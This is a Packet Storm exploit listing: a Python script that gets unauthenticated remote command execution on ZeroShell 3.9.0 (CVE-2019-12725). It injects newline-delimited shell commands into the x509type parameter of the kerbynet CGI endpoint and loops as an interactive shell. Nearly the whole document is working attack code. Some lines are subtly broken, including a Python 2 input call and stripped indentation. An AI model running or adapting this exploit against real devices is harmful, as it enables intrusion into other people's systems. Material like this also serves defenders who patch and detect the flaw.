Lucene search

K
packetstormFellipe OliveiraPACKETSTORM:162561
HistoryMay 13, 2021 - 12:00 a.m.

ZeroShell 3.9.0 Remote Command Execution

2021-05-1300:00:00
Fellipe Oliveira
packetstormsecurity.com
104
`# Exploit Title: ZeroShell 3.9.0 - Remote Command Execution   
# Google Dork: N/A  
# Date: 10/05/2021  
# Exploit Author: Fellipe Oliveira  
# Vendor Homepage: https://zeroshell.org/  
# Software Link: https://zeroshell.org/download/  
# Version: < 3.9.0   
# Tested on: ZeroShell 3.9.0  
# CVE : CVE-2019-12725  
  
#!/usr/bin/python3  
  
import requests  
import optparse  
import time  
  
parser = optparse.OptionParser()  
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')  
  
options, args = parser.parse_args()  
if not options.url:  
print('[+] Specify an url target')  
print('[+] Example usage: exploit.py -u http://target-uri/')  
print('[+] Example help usage: exploit.py -h')  
exit()  
  
uri_zeroshell = options.url  
session = requests.Session()  
  
def command():  
try:  
check = session.get(uri_zeroshell + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A'")  
if check.status_code == 200:  
flag = True  
print('[+] ZeroShell 3.9.0 Remote Command Execution')  
time.sleep(1)  
print('[+] Success connect to target')  
time.sleep(1)  
print('[+] Trying to execute command in ZeroShell OS...\n')  
time.sleep(1)  
check.raise_for_status()   
  
while flag:  
cmd = raw_input("$ ")  
payload = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A" + cmd + "%0A'"  
uri_vuln = uri_zeroshell + payload  
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}  
res = session.get(uri_vuln, headers=burp0_headers, verify=False)  
print(res.text[:res.text.rindex("<html>") / 2])  
  
except requests.exceptions.ConnectionError as err:  
print('[x] Failed to Connect in: '+uri_zeroshell+' ')  
print('[x] This host seems to be Down')  
exit()  
except requests.exceptions.HTTPError as conn:  
print('[x] Failed to execute command in: '+uri_zeroshell+' ')  
print('[x] This host does not appear to be a ZeroShell')  
exit()  
  
command()  
`